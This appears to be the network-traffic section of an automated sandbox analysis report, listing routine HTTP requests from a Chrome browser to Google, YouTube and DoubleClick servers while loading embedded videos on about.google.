    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUloSSx62RoT13bCq798eIaZMtUoDNVc6WGwjISOIqwkmycF5maf5SrFCEuXIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUloSSx62RoT13bCq798eIaZMtUoDNVc6WGwjISOIqwkmycF5maf5SrFCEuX
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmawQQLwrt3ogophM7MPx_ZcgbVQRZq2tRl074vQC_MrdXP8RVRwoVSKJiEIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmawQQLwrt3ogophM7MPx_ZcgbVQRZq2tRl074vQC_MrdXP8RVRwoVSKJiE
    Source: global trafficHTTP traffic detected: GET /js/th/GCBvWy_yb866hkOUIGxUHdK41VpQSXIVky7cQUZngWQ.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmawQQLwrt3ogophM7MPx_ZcgbVQRZq2tRl074vQC_MrdXP8RVRwoVSKJiEIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /vi_webp/4WXs3sKu41I/maxresdefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ytc/AL5GRJUNolsa3j03QZxx3egj_yEP6gNK4lzbFRCUgdoi6SM=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMjIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmawQQLwrt3ogophM7MPx_ZcgbVQRZq2tRl074vQC_MrdXP8RVRwoVSKJiE
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMjIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMj
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMj
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMjIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMj
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMj
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMjIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMj
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkww_S5vpMMCpNhmLipxqs3XWPuKwbUAzkYaYZSDbCcLkwvPfQMfOg4bdMjIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /generate_204?cfkIgg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?lrpm6Q HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/rokGy0huYEA?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?642dMg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/EqboAI-Vk-U?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?Yx10ZA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/vI4LHl4yFuo?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=11Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?UlTn9A HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/ZRCdORJiUgU?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?ereH0A HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/xY_MUB8adEQ?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=21Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?YAveBA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/SAIEamakLoY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=23Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?U0k5Tw HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/6aFdEhEZQjE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
